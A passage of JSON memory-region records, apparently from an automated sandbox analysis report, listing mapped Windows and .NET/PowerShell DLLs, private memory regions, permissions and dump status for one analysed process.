{ "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 212992, "start_va": 8791631986688, "type": "region", "version": 1 }, "end_va": 8791632199679, "entry_point": 8791631992976, "filename": "\\Windows\\System32\\shdocvw.dll", "id": "region_1518", "name": "shdocvw.dll", "norm_filename": "c:\\windows\\system32\\shdocvw.dll", "region_type": "memory_mapped_file", "start_va": 8791631986688, "timestamp": "00:01:08.454", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 356352, "start_va": 8791682449408, "type": "region", "version": 1 }, "end_va": 8791682805759, "entry_point": 8791682453784, "filename": "\\Windows\\System32\\apphelp.dll", "id": "region_1519", "name": "apphelp.dll", "norm_filename": "c:\\windows\\system32\\apphelp.dll", "region_type": "memory_mapped_file", "start_va": 8791682449408, "timestamp": "00:01:08.455", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 184320, "start_va": 8791738548224, "type": "region", "version": 1 }, "end_va": 8791738732543, "entry_point": 8791738552336, "filename": "\\Windows\\System32\\ntmarta.dll", "id": "region_1520", "name": "ntmarta.dll", "norm_filename": "c:\\windows\\system32\\ntmarta.dll", "region_type": "memory_mapped_file", "start_va": 8791738548224, "timestamp": "00:01:08.456", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 106496, "start_va": 8791757881344, "type": "region", "version": 1 }, "end_va": 8791757987839, "entry_point": 8791757886808, "filename": "\\Windows\\System32\\devobj.dll", "id": "region_1521", "name": "devobj.dll", "norm_filename": "c:\\windows\\system32\\devobj.dll", "region_type": "memory_mapped_file", "start_va": 8791757881344, "timestamp": "00:01:08.456", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 221184, "start_va": 8791758471168, "type": "region", "version": 1 }, "end_va": 8791758692351, "entry_point": 8791758476404, "filename": "\\Windows\\System32\\cfgmgr32.dll", "id": "region_1522", "name": "cfgmgr32.dll", "norm_filename": "c:\\windows\\system32\\cfgmgr32.dll", "region_type": "memory_mapped_file", "start_va": 8791758471168, "timestamp": "00:01:08.457", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 1929216, "start_va": 8791759716352, "type": "region", "version": 1 }, "end_va": 8791761645567, "entry_point": 8791759720464, "filename": "\\Windows\\System32\\setupapi.dll", "id": "region_1523", "name": "setupapi.dll", "norm_filename": "c:\\windows\\system32\\setupapi.dll", "region_type": "memory_mapped_file", "start_va": 8791759716352, "timestamp": "00:01:08.457", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 335872, "start_va": 8791772823552, "type": "region", "version": 1 }, "end_va": 8791773159423, "entry_point": 8791772827860, "filename": "\\Windows\\System32\\Wldap32.dll", "id": "region_1524", "name": "wldap32.dll", "norm_filename": "c:\\windows\\system32\\wldap32.dll", "region_type": "memory_mapped_file", "start_va": 8791772823552, "timestamp": "00:01:08.458", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000009-region_00001525-addr_0x000007fffffd9000-size_0x0000000000002000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_249", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 8192, "start_va": 8796092862464, "type": "region", "version": 1 }, "end_va": 8796092870655, "entry_point": 0, "filename": null, "id": "region_1525", "name": "private_0x000007fffffd9000", "norm_filename": null, "region_type": "private_memory", "start_va": 8796092862464, "timestamp": "00:01:08.459", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "untracked_file_region" ], "info": "No dump was created because mapped file is not tracked", "permissions": [ "readable" ], "ref_process_dump": null, "size": 16384, "start_va": 2031616, "type": "region", "version": 1 }, "end_va": 2047999, "entry_point": 2031616, "filename": "\\ProgramData\\Microsoft\\Windows\\Caches\\cversions.2.db", "id": "region_1584", "name": "cversions.2.db", "norm_filename": "c:\\programdata\\microsoft\\windows\\caches\\cversions.2.db", "region_type": "memory_mapped_file", "start_va": 2031616, "timestamp": "00:01:08.816", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "untracked_file_region" ], "info": "No dump was created because mapped file is not tracked", "permissions": [ "readable" ], "ref_process_dump": null, "size": 196608, "start_va": 29753344, "type": "region", "version": 1 }, "end_va": 29949951, "entry_point": 29753344, "filename": "\\ProgramData\\Microsoft\\Windows\\Caches\\{6AF0698E-D558-4F6E-9B3C-3716689AF493}.2.ver0x0000000000000018.db", "id": "region_1585", "name": "{6af0698e-d558-4f6e-9b3c-3716689af493}.2.ver0x0000000000000018.db", "norm_filename": "c:\\programdata\\microsoft\\windows\\caches\\{6af0698e-d558-4f6e-9b3c-3716689af493}.2.ver0x0000000000000018.db", "region_type": "memory_mapped_file", "start_va": 29753344, "timestamp": "00:01:08.816", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "untracked_file_region" ], "info": "No dump was created because mapped file is not tracked", "permissions": [ "readable" ], "ref_process_dump": null, "size": 16384, "start_va": 29949952, "type": "region", "version": 1 }, "end_va": 29966335, "entry_point": 29949952, "filename": "\\ProgramData\\Microsoft\\Windows\\Caches\\cversions.2.db", "id": "region_1586", "name": "cversions.2.db", "norm_filename": "c:\\programdata\\microsoft\\windows\\caches\\cversions.2.db", "region_type": "memory_mapped_file", "start_va": 29949952, "timestamp": "00:01:08.817", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "untracked_file_region" ], "info": "No dump was created because mapped file is not tracked", "permissions": [ "readable" ], "ref_process_dump": null, "size": 417792, "start_va": 35454976, "type": "region", "version": 1 }, "end_va": 35872767, "entry_point": 35454976, "filename": "\\ProgramData\\Microsoft\\Windows\\Caches\\{DDF571F2-BE98-426D-8288-1A9A39C3FDA2}.2.ver0x0000000000000002.db", "id": "region_1587", "name": "{ddf571f2-be98-426d-8288-1a9a39c3fda2}.2.ver0x0000000000000002.db", "norm_filename": "c:\\programdata\\microsoft\\windows\\caches\\{ddf571f2-be98-426d-8288-1a9a39c3fda2}.2.ver0x0000000000000002.db", "region_type": "memory_mapped_file", "start_va": 35454976, "timestamp": "00:01:08.817", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_total_dump_size_reached" ], "info": "No dump or only a partial dump was created because the total dump size was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 524288, "start_va": 42467328, "type": "region", "version": 1 }, "end_va": 42991615, "entry_point": 0, "filename": null, "id": "region_1588", "name": "private_0x0000000002880000", "norm_filename": null, "region_type": "private_memory", "start_va": 42467328, "timestamp": "00:01:08.820", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 49152, "start_va": 8791631921152, "type": "region", "version": 1 }, "end_va": 8791631970303, "entry_point": 8791631926144, "filename": "\\Windows\\System32\\linkinfo.dll", "id": "region_1589", "name": "linkinfo.dll", "norm_filename": "c:\\windows\\system32\\linkinfo.dll", "region_type": "memory_mapped_file", "start_va": 8791631921152, "timestamp": "00:01:08.820", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 524288, "start_va": 8791659053056, "type": "region", "version": 1 }, "end_va": 8791659577343, "entry_point": 8791659072140, "filename": "\\Windows\\System32\\ntshrui.dll", "id": "region_1590", "name": "ntshrui.dll", "norm_filename": "c:\\windows\\system32\\ntshrui.dll", "region_type": "memory_mapped_file", "start_va": 8791659053056, "timestamp": "00:01:08.820", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 61440, "start_va": 8791659577344, "type": "region", "version": 1 }, "end_va": 8791659638783, "entry_point": 8791659581504, "filename": "\\Windows\\System32\\cscapi.dll", "id": "region_1591", "name": "cscapi.dll", "norm_filename": "c:\\windows\\system32\\cscapi.dll", "region_type": "memory_mapped_file", "start_va": 8791659577344, "timestamp": "00:01:08.821", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 45056, "start_va": 8791729766400, "type": "region", "version": 1 }, "end_va": 8791729811455, "entry_point": 8791729786764, "filename": "\\Windows\\System32\\slc.dll", "id": "region_1592", "name": "slc.dll", "norm_filename": "c:\\windows\\system32\\slc.dll", "region_type": "memory_mapped_file", "start_va": 8791729766400, "timestamp": "00:01:08.821", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 143360, "start_va": 8791753228288, "type": "region", "version": 1 }, "end_va": 8791753371647, "entry_point": 8791753232792, "filename": "\\Windows\\System32\\srvcli.dll", "id": "region_1593", "name": "srvcli.dll", "norm_filename": "c:\\windows\\system32\\srvcli.dll", "region_type": "memory_mapped_file", "start_va": 8791753228288, "timestamp": "00:01:08.822", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000009-region_00001594-addr_0x000007fffffd7000-size_0x0000000000002000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_263", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 8192, "start_va": 8796092854272, "type": "region", "version": 1 }, "end_va": 8796092862463, "entry_point": 0, "filename": null, "id": "region_1594", "name": "private_0x000007fffffd7000", "norm_filename": null, "region_type": "private_memory", "start_va": 8796092854272, "timestamp": "00:01:08.823", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "untracked_file_region" ], "info": "No dump was created because mapped file is not tracked", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 626688, "start_va": 8791550525440, "type": "region", "version": 1 }, "end_va": 8791551152127, "entry_point": 8791550535280, "filename": "\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscoreei.dll", "id": "region_1595", "name": "mscoreei.dll", "norm_filename": "c:\\windows\\microsoft.net\\framework64\\v4.0.30319\\mscoreei.dll", "region_type": "memory_mapped_file", "start_va": 8791550525440, "timestamp": "00:01:08.846", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 290816, "start_va": 8791744839680, "type": "region", "version": 1 }, "end_va": 8791745130495, "entry_point": 8791744843876, "filename": "\\Windows\\System32\\rsaenh.dll", "id": "region_1596", "name": "rsaenh.dll", "norm_filename": "c:\\windows\\system32\\rsaenh.dll", "region_type": "memory_mapped_file", "start_va": 8791744839680, "timestamp": "00:01:08.847", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 94208, "start_va": 8791747985408, "type": "region", "version": 1 }, "end_va": 8791748079615, "entry_point": 8791747998392, "filename": "\\Windows\\System32\\cryptsp.dll", "id": "region_1597", "name": "cryptsp.dll", "norm_filename": "c:\\windows\\system32\\cryptsp.dll", "region_type": "memory_mapped_file", "start_va": 8791747985408, "timestamp": "00:01:08.847", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 4096, "start_va": 30015488, "type": "region", "version": 1 }, "end_va": 30019583, "entry_point": 0, "filename": null, "id": "region_1598", "name": "pagefile_0x0000000001ca0000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 30015488, "timestamp": "00:01:08.949", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000009-region_00001599-addr_0x00000000029e0000-size_0x0000000000010000-perm_rw.bin", "flags": [ "max_total_dump_size_reached" ], "info": "No dump or only a partial dump was created because the total dump size was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_264", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 65536, "start_va": 43909120, "type": "region", "version": 1 }, "end_va": 43974655, "entry_point": 0, "filename": null, "id": "region_1599", "name": "private_0x00000000029e0000", "norm_filename": null, "region_type": "private_memory", "start_va": 43909120, "timestamp": "00:01:08.950", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000009-region_00001600-addr_0x0000000002ae0000-size_0x0000000000080000-perm_rwx.bin", "flags": [ "max_total_dump_size_reached" ], "info": "No dump or only a partial dump was created because the total dump size was reached", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": { "ref_id": "proc_dump_265", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 524288, "start_va": 44957696, "type": "region", "version": 1 }, "end_va": 45481983, "entry_point": 0, "filename": null, "id": "region_1600", "name": "private_0x0000000002ae0000", "norm_filename": null, "region_type": "private_memory", "start_va": 44957696, "timestamp": "00:01:08.950", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000009-region_00001601-addr_0x0000000002b60000-size_0x0000000000100000-perm_rw.bin", "flags": [ "max_total_dump_size_reached" ], "info": "No dump or only a partial dump was created because the total dump size was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_266", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 1048576, "start_va": 45481984, "type": "region", "version": 1 }, "end_va": 46530559, "entry_point": 0, "filename": null, "id": "region_1601", "name": "private_0x0000000002b60000", "norm_filename": null, "region_type": "private_memory", "start_va": 45481984, "timestamp": "00:01:08.951", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 823296, "start_va": 1966473216, "type": "region", "version": 1 }, "end_va": 1967296511, "entry_point": 1966484976, "filename": "\\Windows\\winsxs\\amd64_microsoft.vc80.crt_1fc8b3b9a1e18e3b_8.0.50727.6195_none_88e41e092fab0294\\msvcr80.dll", "id": "region_1602", "name": "msvcr80.dll", "norm_filename": "c:\\windows\\winsxs\\amd64_microsoft.vc80.crt_1fc8b3b9a1e18e3b_8.0.50727.6195_none_88e41e092fab0294\\msvcr80.dll", "region_type": "memory_mapped_file", "start_va": 1966473216, "timestamp": "00:01:08.951", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "untracked_file_region" ], "info": "No dump was created because mapped file is not tracked", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 10080256, "start_va": 8791320756224, "type": "region", "version": 1 }, "end_va": 8791330836479, "entry_point": 8791325254400, "filename": "\\Windows\\Microsoft.NET\\Framework64\\v2.0.50727\\mscorwks.dll", "id": "region_1603", "name": "mscorwks.dll", "norm_filename": "c:\\windows\\microsoft.net\\framework64\\v2.0.50727\\mscorwks.dll", "region_type": "memory_mapped_file", "start_va": 8791320756224, "timestamp": "00:01:08.952", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 49152, "start_va": 8791740448768, "type": "region", "version": 1 }, "end_va": 8791740497919, "entry_point": 8791740452964, "filename": "\\Windows\\System32\\version.dll", "id": "region_1604", "name": "version.dll", "norm_filename": "c:\\windows\\system32\\version.dll", "region_type": "memory_mapped_file", "start_va": 8791740448768, "timestamp": "00:01:08.952", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 12288, "start_va": 30081024, "type": "region", "version": 1 }, "end_va": 30093311, "entry_point": 0, "filename": null, "id": "region_1621", "name": "pagefile_0x0000000001cb0000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 30081024, "timestamp": "00:01:09.185", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 4096, "start_va": 30146560, "type": "region", "version": 1 }, "end_va": 30150655, "entry_point": 0, "filename": null, "id": "region_1622", "name": "pagefile_0x0000000001cc0000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 30146560, "timestamp": "00:01:09.185", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000009-region_00001623-addr_0x0000000001d80000-size_0x0000000000020000-perm_.bin", "flags": [ "max_total_dump_size_reached" ], "info": "No dump or only a partial dump was created because the total dump size was reached", "permissions": [ "" ], "ref_process_dump": { "ref_id": "proc_dump_277", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 131072, "start_va": 30932992, "type": "region", "version": 1 }, "end_va": 31064063, "entry_point": 0, "filename": null, "id": "region_1623", "name": "private_0x0000000001d80000", "norm_filename": null, "region_type": "private_memory", "start_va": 30932992, "timestamp": "00:01:09.186", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_total_dump_size_reached" ], "info": "No dump or only a partial dump was created because the total dump size was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 524288, "start_va": 44105728, "type": "region", "version": 1 }, "end_va": 44630015, "entry_point": 0, "filename": null, "id": "region_1624", "name": "private_0x0000000002a10000", "norm_filename": null, "region_type": "private_memory", "start_va": 44105728, "timestamp": "00:01:09.186", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_total_dump_size_reached" ], "info": "No dump or only a partial dump was created because the total dump size was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 524288, "start_va": 46792704, "type": "region", "version": 1 }, "end_va": 47316991, "entry_point": 0, "filename": null, "id": "region_1625", "name": "private_0x0000000002ca0000", "norm_filename": null, "region_type": "private_memory", "start_va": 46792704, "timestamp": "00:01:09.186", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "region_too_big" ], "info": "No dump was created because region size surpasses maximum region dump size of the configuration", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 402653184, "start_va": 47316992, "type": "region", "version": 1 }, "end_va": 449970175, "entry_point": 0, "filename": null, "id": "region_1626", "name": "private_0x0000000002d20000", "norm_filename": null, "region_type": "private_memory", "start_va": 47316992, "timestamp": "00:01:09.194", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000009-region_00001627-addr_0x000000001ad20000-size_0x00000000006d0000-perm_rw.bin", "flags": [ "max_total_dump_size_reached" ], "info": "No dump or only a partial dump was created because the total dump size was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_278", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 7143424, "start_va": 449970176, "type": "region", "version": 1 }, "end_va": 457113599, "entry_point": 0, "filename": null, "id": "region_1627", "name": "private_0x000000001ad20000", "norm_filename": null, "region_type": "private_memory", "start_va": 449970176, "timestamp": "00:01:09.194", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000009-region_00001628-addr_0x000000001b3f0000-size_0x0000000000101000-perm_rw.bin", "flags": [ "max_total_dump_size_reached" ], "info": "No dump or only a partial dump was created because the total dump size was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_279", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 1052672, "start_va": 457113600, "type": "region", "version": 1 }, "end_va": 458166271, "entry_point": 0, "filename": null, "id": "region_1628", "name": "private_0x000000001b3f0000", "norm_filename": null, "region_type": "private_memory", "start_va": 457113600, "timestamp": "00:01:09.195", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "region_too_big" ], "info": "No dump was created because region size surpasses maximum region dump size of the configuration", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 15581184, "start_va": 8791305158656, "type": "region", "version": 1 }, "end_va": 8791320739839, "entry_point": 8791305158656, "filename": "\\Windows\\assembly\\NativeImages_v2.0.50727_64\\mscorlib\\9469491f37d9c35b596968b206615309\\mscorlib.ni.dll", "id": "region_1629", "name": "mscorlib.ni.dll", "norm_filename": "c:\\windows\\assembly\\nativeimages_v2.0.50727_64\\mscorlib\\9469491f37d9c35b596968b206615309\\mscorlib.ni.dll", "region_type": "memory_mapped_file", "start_va": 8791305158656, "timestamp": "00:01:09.195", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_total_dump_size_reached" ], "info": "No dump or only a partial dump was created because the total dump size was reached", "permissions": [ "" ], "ref_process_dump": null, "size": 65536, "start_va": 8791798185984, "type": "region", "version": 1 }, "end_va": 8791798251519, "entry_point": 0, "filename": null, "id": "region_1630", "name": "private_0x000007ff00020000", "norm_filename": null, "region_type": "private_memory", "start_va": 8791798185984, "timestamp": "00:01:09.196", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000009-region_00001631-addr_0x000007ff00030000-size_0x0000000000010000-perm_.bin", "flags": [ "max_total_dump_size_reached" ], "info": "No dump or only a partial dump was created because the total dump size was reached", "permissions": [ "" ], "ref_process_dump": { "ref_id": "proc_dump_280", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 65536, "start_va": 8791798251520, "type": "region", "version": 1 }, "end_va": 8791798317055, "entry_point": 0, "filename": null, "id": "region_1631", "name": "private_0x000007ff00030000", "norm_filename": null, "region_type": "private_memory", "start_va": 8791798251520, "timestamp": "00:01:09.196", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_total_dump_size_reached" ], "info": "No dump or only a partial dump was created because the total dump size was reached", "permissions": [ "" ], "ref_process_dump": null, "size": 655360, "start_va": 8791798317056, "type": "region", "version": 1 }, "end_va": 8791798972415, "entry_point": 0, "filename": null, "id": "region_1632", "name": "private_0x000007ff00040000", "norm_filename": null, "region_type": "private_memory", "start_va": 8791798317056, "timestamp": "00:01:09.197", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000009-region_00001633-addr_0x000007ff000e0000-size_0x0000000000010000-perm_.bin", "flags": [ "max_total_dump_size_reached" ], "info": "No dump or only a partial dump was created because the total dump size was reached", "permissions": [ "" ], "ref_process_dump": { "ref_id": "proc_dump_281", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 65536, "start_va": 8791798972416, "type": "region", "version": 1 }, "end_va": 8791799037951, "entry_point": 0, "filename": null, "id": "region_1633", "name": "private_0x000007ff000e0000", "norm_filename": null, "region_type": "private_memory", "start_va": 8791798972416, "timestamp": "00:01:09.197", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000009-region_00001634-addr_0x000007ff000f0000-size_0x0000000000070000-perm_.bin", "flags": [ "max_total_dump_size_reached" ], "info": "No dump or only a partial dump was created because the total dump size was reached", "permissions": [ "" ], "ref_process_dump": { "ref_id": "proc_dump_282", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 458752, "start_va": 8791799037952, "type": "region", "version": 1 }, "end_va": 8791799496703, "entry_point": 0, "filename": null, "id": "region_1634", "name": "private_0x000007ff000f0000", "norm_filename": null, "region_type": "private_memory", "start_va": 8791799037952, "timestamp": "00:01:09.197", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000009-region_00001635-addr_0x000007fffffd3000-size_0x0000000000002000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_283", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 8192, "start_va": 8796092837888, "type": "region", "version": 1 }, "end_va": 8796092846079, "entry_point": 0, "filename": null, "id": "region_1635", "name": "private_0x000007fffffd3000", "norm_filename": null, "region_type": "private_memory", "start_va": 8796092837888, "timestamp": "00:01:09.197", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000009-region_00001636-addr_0x000007fffffd5000-size_0x0000000000002000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_284", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 8192, "start_va": 8796092846080, "type": "region", "version": 1 }, "end_va": 8796092854271, "entry_point": 0, "filename": null, "id": "region_1636", "name": "private_0x000007fffffd5000", "norm_filename": null, "region_type": "private_memory", "start_va": 8796092846080, "timestamp": "00:01:09.197", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000009-region_00001705-addr_0x0000000001cd0000-size_0x0000000000010000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_309", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 65536, "start_va": 30212096, "type": "region", "version": 1 }, "end_va": 30277631, "entry_point": 0, "filename": null, "id": "region_1705", "name": "private_0x0000000001cd0000", "norm_filename": null, "region_type": "private_memory", "start_va": 30212096, "timestamp": "00:01:10.995", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 3022848, "start_va": 458227712, "type": "region", "version": 1 }, "end_va": 461250559, "entry_point": 458227712, "filename": "\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", "id": "region_1706", "name": "system.management.automation.dll", "norm_filename": "c:\\windows\\assembly\\gac_msil\\system.management.automation\\1.0.0.0__31bf3856ad364e35\\system.management.automation.dll", "region_type": "memory_mapped_file", "start_va": 458227712, "timestamp": "00:01:10.995", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "untracked_file_region" ], "info": "No dump was created because mapped file is not tracked", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 729088, "start_va": 8791263477760, "type": "region", "version": 1 }, "end_va": 8791264206847, "entry_point": 8791263477760, "filename": "\\Windows\\assembly\\NativeImages_v2.0.50727_64\\Microsoft.PowerShel#\\b023321bc53c20c10ccbbd8f78c82c82\\Microsoft.PowerShell.ConsoleHost.ni.dll", "id": "region_1707", "name": "microsoft.powershell.consolehost.ni.dll", "norm_filename": "c:\\windows\\assembly\\nativeimages_v2.0.50727_64\\microsoft.powershel#\\b023321bc53c20c10ccbbd8f78c82c82\\microsoft.powershell.consolehost.ni.dll", "region_type": "memory_mapped_file", "start_va": 8791263477760, "timestamp": "00:01:11.002", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "region_too_big" ], "info": "No dump was created because region size surpasses maximum region dump size of the configuration", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 10629120, "start_va": 8791294476288, "type": "region", "version": 1 }, "end_va": 8791305105407, "entry_point": 8791294476288, "filename": "\\Windows\\assembly\\NativeImages_v2.0.50727_64\\System\\adff7dd9fe8e541775c46b6363401b22\\System.ni.dll", "id": "region_1708", "name": "system.ni.dll", "norm_filename": "c:\\windows\\assembly\\nativeimages_v2.0.50727_64\\system\\adff7dd9fe8e541775c46b6363401b22\\system.ni.dll", "region_type": "memory_mapped_file", "start_va": 8791294476288, "timestamp": "00:01:11.009", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000009-region_00001709-addr_0x000007fffff10000-size_0x0000000000010000-perm_rwx.bin", "flags": [ "max_total_dump_size_reached" ], "info": "No dump or only a partial dump was created because the total dump size was reached", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": { "ref_id": "proc_dump_310", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 65536, "start_va": 8796092039168, "type": "region", "version": 1 }, "end_va": 8796092104703, "entry_point": 0, "filename": null, "id": "region_1709", "name": "private_0x000007fffff10000", "norm_filename": null, "region_type": "private_memory", "start_va": 8796092039168, "timestamp": "00:01:11.010", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000009-region_00001710-addr_0x000007fffff20000-size_0x0000000000090000-perm_rwx.bin", "flags": [ "max_total_dump_size_reached" ], "info": "No dump or only a partial dump was created because the total dump size was reached", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": { "ref_id": "proc_dump_311", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 589824, "start_va": 8796092104704, "type": "region", "version": 1 }, "end_va": 8796092694527, "entry_point": 0, "filename": null, "id": "region_1710", "name": "private_0x000007fffff20000", "norm_filename": null, "region_type": "private_memory", "start_va": 8796092104704, "timestamp": "00:01:11.010", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "region_too_big" ], "info": "No dump was created because region size surpasses maximum region dump size of the configuration", 